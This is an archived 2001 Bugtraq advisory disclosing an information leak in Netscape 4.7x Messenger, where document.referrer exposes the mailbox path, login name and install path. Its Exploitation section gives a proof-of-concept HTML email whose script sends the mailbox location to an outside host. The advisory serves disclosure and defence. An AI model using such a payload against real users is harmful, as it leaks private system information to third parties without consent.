OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Tue Jun 05 2001 - 07:01:19 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hello bugtraq,

    There are known bugs in Netscape which require information on user's
    files location. This bug is not serious one, but it allows to get this
    location.

    Topic : Netscape 4.7x user information retrival
    Author : 3APA3A <3APA3Asecurity.nnov.ru>
    Affected software : Netscape 4.7x All Platforms
    Vendor : Netscape (IPlanet)
    Risk : Low
    Remotely Exploitable : Yes
    Released : 30 May 2001
    Vendor URL : http://www.netscape.com
    SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories

    Background:

    Netscape Messanger uses internal protocol called mailbox://. The
    format of mailbox URI is

    mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber

    this URI contains full path to user's mailbox which usually contains
    user's login name and in case of Windows 9x - the path to Netscape
    installation. It's impossible to determine this location from
    javascript inside e-mail message, because Netscape hides
    document.location from javascript.

    Problem:

    It's possible to retrieve mailbox:// URI of the message. E.g., it's
    possible to retrieve mailbox location, user's system login and in some
    cases path to Netscape installation.

    Details:

    When link invoked from message, Netscape sets "document.referrer"
    property to URI of the message contained this link. Javascript on the
    target page is able to retrieve this property and pass it to any
    location together with IP of calling machine.

    Exploitation:

    If you read this message with Netscape Messanger you can simply click
    reference http://www.security.nnov.ru/files/nsdemo.asp to see your
    mailbox location or you can force Netscape user to open this page with
    message like this:

    -=-=-=-=-=-=-=-=-=-
    From: 3APA3A
    To: 3APA3A
    Subject: Test your Netscape
    Content-Type: text/html

    <html><script>
     window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
    </script>
    <A
     HREF="http://www.security.nnov.ru/files/nsdemo.asp"
    >
     http://www.security.nnov.ru/files/nsdemo.asp
    </A>
    </html>
    -=-=-=-=-=-=-=-=-=-

    Vendor:

    Netscape was contacted May, 30 2001 via
     http://help.netscape.com/forms/bug-security.html
    No feedback were given.

    -- 
    http://www.security.nnov.ru
             /\_/\
            { . . }     |\
    +--oQQo->{ ^ }<-----+ \
    |  3APA3A  U  3APA3A   }
    +-------------o66o--+ /
                        |/
    You know my name - look up my number (The Beatles)